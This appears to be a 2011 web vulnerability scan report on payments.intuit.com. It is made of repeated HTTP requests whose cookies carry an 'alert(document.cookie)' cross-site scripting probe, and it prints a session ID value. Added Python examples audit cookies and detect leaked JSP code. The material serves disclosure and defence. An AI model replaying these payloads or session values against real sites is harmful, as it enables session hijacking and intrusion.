Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/custom-gift-card-program.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/online-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/point-of-sale-solutions.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/process-card-payments-for-mac.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/quickbooks-online-billing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /products/quickbooks-payment-solutions/web-credit-card-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /sbweb/common/includes/header/super_navigation/includes/search.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
Request
GET /support/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
The highlighted cookie appears to contain a session token (INTUIT_SESSIONID, judging by its name), which may increase the risk associated with this issue. Review the contents of the cookies to determine their function.
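The repeated advice above is to review the cookie jar and decide which cookies actually carry session state. The following is an added example, not part of the XSS.CX report, showing one way to triage a Cookie header offline: it splits the header into name/value pairs, flags cookies whose name looks session-related and whose value is long and high-entropy (the signals a scanner uses to say "appears to contain a session token"), and also flags values that, once URL-decoded, contain script fragments, as the qbn.qbo_sc and s_cpm cookies in these requests do. The cookie string is an excerpt of the one shown in the requests; the name pattern and the entropy threshold are assumptions chosen for this example, not values from the report.

```python
import math
import re
from urllib.parse import unquote

# Excerpt of the Cookie header sent in the requests above (values copied as-is).
COOKIE_HEADER = (
    "priorityCode=4899600000; Survey_Tracker=TRUE; "
    "INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; "
    "SHOPPER_USER_ID=2848631086; Sgmt=default; "
    "qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; "
    "s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba"
    "%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; "
    "abTestGroup=T16;"
)

# Assumed heuristics for this example: names that commonly denote session state,
# and fragments that indicate a script payload has been stored in a cookie value.
SESSION_NAME_RE = re.compile(r"sess|sid|token|auth|jsessionid", re.I)
SCRIPT_RE = re.compile(r"alert\s*\(|<script|javascript:|onerror=", re.I)


def parse_cookie_header(header):
    """Split a Cookie request header into an ordered list of (name, value) pairs."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name.strip(), value.strip()))
    return pairs


def shannon_entropy(s):
    """Bits of entropy per character; random-looking tokens score well above 3.5."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def audit_cookies(header, min_len=16, min_entropy=3.5):
    """Return, per cookie, the three signals a reviewer would look at."""
    report = {}
    for name, value in parse_cookie_header(header):
        decoded = unquote(value)  # payloads are usually percent-encoded in the jar
        report[name] = {
            "session_like_name": bool(SESSION_NAME_RE.search(name)),
            "high_entropy": len(value) >= min_len and shannon_entropy(value) >= min_entropy,
            "script_payload": bool(SCRIPT_RE.search(decoded)),
        }
    return report


def session_token_candidates(report):
    """Cookies that both look like a session cookie by name and carry a random-looking value."""
    return [n for n, f in report.items() if f["session_like_name"] and f["high_entropy"]]


def payload_carriers(report):
    """Cookies whose decoded value already contains a script fragment."""
    return [n for n, f in report.items() if f["script_payload"]]


if __name__ == "__main__":
    rep = audit_cookies(COOKIE_HEADER)
    print("session token candidates:", session_token_candidates(rep))
    print("cookies carrying script payloads:", payload_carriers(rep))
```

The entropy test alone is not a classifier: tracking cookies such as BE_CLA or mbox in the full header are long and varied too, which is why the candidate list requires a session-like name as well. The payload check is the one worth running after any XSS test, since a stored `"-alert(document.cookie)-"` fragment turns every page that echoes the cookie into a second place to look.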
Request
GET /support/glossary.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Response
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:40 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: application/javascript
Content-Length: 11613
var INCLUDE_OBJECT = PaymentsInclude;
var testcell;
var p20;
var v20;
function getFieldValue(fieldId) {
    s=s_gi(s_account);
    s.linkTrackVars = "prop20,eVar20";
    fieldValue = document.getElementB ...[SNIP]... 1;
}
if (s.evar2 == 'ipsi') {
    var ipd2;
    var ipd3;
    if (!("undefined" == typeof(wa))) {
        if (wa.ipd2) {ipd2 = wa.ipd2}
        if (wa.ipd3) {ipd3 = wa.ipd3}
    } else {
        ipd2='ipd_ips_<%=session.getAttribute("qbflv") %>_<%=session.getAttribute("qbsku") %>_<%=session.getAttribute("qbver") %>_<%=session.getAttribute("t1") %>_<%=session.getAttribute("t2") %>_<%=session.getAttribute("p_prioritycode") %>';
        ipd3 = '<%=session.getAttribute("qbflv") %><%=session.getAttribute("qbver") %>';
    }
    // IPD Central tracking - ipd_ips_sku_version_testcell_segment_pcode
    s.prop35=s.eVar35=ipd2;
    // IPD Central tracking - flavor + version
    s.prop34=s.eVar34=ipd3;
}
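The JavaScript response above is served as application/javascript with a Last-Modified header, yet it still contains unevaluated JSP expressions such as `<%=session.getAttribute("qbflv") %>`: the file was delivered as a static resource rather than compiled by the JSP engine. In the browser these strings are harmless (they sit inside JavaScript string literals), but they disclose server-side code and the names of the session attributes the application keeps. The following is an added example, not part of the XSS.CX report, of a check that flags unrendered JSP markers in a response body and lists the session attribute names they reveal. The sample response is a constructed excerpt modelled on the one shown above; the regular expressions are this example's own.

```python
import re

# Constructed excerpt modelled on the application/javascript response above.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\n"
    "Server: Apache\n"
    "Content-Type: application/javascript\n"
    "\n"
    "if (s.evar2 == 'ipsi') {\n"
    "  var ipd2; var ipd3;\n"
    "  if (!(\"undefined\" == typeof(wa))) {\n"
    "    if (wa.ipd2) {ipd2 = wa.ipd2} if (wa.ipd3) {ipd3 = wa.ipd3}\n"
    "  } else {\n"
    "    ipd2='ipd_ips_<%=session.getAttribute(\"qbflv\") %>_<%=session.getAttribute(\"qbsku\") %>"
    "_<%=session.getAttribute(\"qbver\") %>_<%=session.getAttribute(\"t1\") %>"
    "_<%=session.getAttribute(\"t2\") %>_<%=session.getAttribute(\"p_prioritycode\") %>';\n"
    "    ipd3 = '<%=session.getAttribute(\"qbflv\") %><%=session.getAttribute(\"qbver\") %>';\n"
    "  }\n"
    "  s.prop35=s.eVar35=ipd2;\n"
    "  s.prop34=s.eVar34=ipd3;\n"
    "}\n"
)

# JSP syntax that should never reach a client. The scriptlet pattern excludes
# expressions (<%=), directives (<%@) and JSP comments (<%--) so each hit is
# reported under exactly one kind.
TEMPLATE_MARKERS = {
    "jsp_expression": re.compile(r"<%=\s*(.*?)\s*%>", re.S),
    "jsp_directive": re.compile(r"<%@\s*(.*?)\s*%>", re.S),
    "jsp_scriptlet": re.compile(r"<%(?!=|@|--)\s*(.*?)\s*%>", re.S),
}

# Attribute names read from the HttpSession; their presence in client-visible
# code is the information disclosure worth recording.
SESSION_ATTR_RE = re.compile(r'session\.getAttribute\("([^"]+)"\)')


def split_response(raw):
    """Separate a raw HTTP response into a lower-cased header dict and the body."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:  # skip the status line
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return headers, body


def find_unrendered_templates(body):
    """Return (kind, inner_text) for every JSP marker left in the body."""
    hits = []
    for kind, rx in TEMPLATE_MARKERS.items():
        for match in rx.finditer(body):
            hits.append((kind, match.group(1)))
    return hits


def leaked_session_attributes(body):
    """Distinct session attribute names exposed by unrendered expressions."""
    return sorted(set(SESSION_ATTR_RE.findall(body)))


def audit_response(raw):
    """Combine content type, template hits and leaked names into one finding."""
    headers, body = split_response(raw)
    return {
        "content_type": headers.get("content-type", ""),
        "template_hits": find_unrendered_templates(body),
        "session_attributes": leaked_session_attributes(body),
    }


if __name__ == "__main__":
    finding = audit_response(SAMPLE_RESPONSE)
    print(finding["content_type"], len(finding["template_hits"]), "unrendered JSP markers")
    print("session attributes disclosed:", finding["session_attributes"])
```

A hit on a text/html or application/javascript response is a strong signal, since a correctly mapped .jsp would have been compiled before the bytes left the server; the usual cause is a .js file that was authored as a JSP fragment but is served from a static path. Expression Language (`${...}`) is deliberately not matched here because the same syntax is legitimate in JavaScript template literals.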
5. Cross-domain Referer leakage
There are 5 instances of this issue:
...[SNIP]... <a href ="mailto:gopayment_sales@intuit.com?subject=GoPayment-Supported-Phones"> ...[SNIP]... <p> If you've already applied and have questions on the status of your application, send an e-mail to app-status@intuit.com or call
<!-- Changes NIGIRI Support Phone numbers --> ...[SNIP]...
...[SNIP]... <p> If you've already applied and have questions about the status of your application, send an e-mail to app-status@intuit.com or please call
<!-- Changes NIGIRI Support Phone numbers --> ...[SNIP]...
HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:21:26 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 05:28:55 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Content-Type: application/javascript
Content-Length: 27792
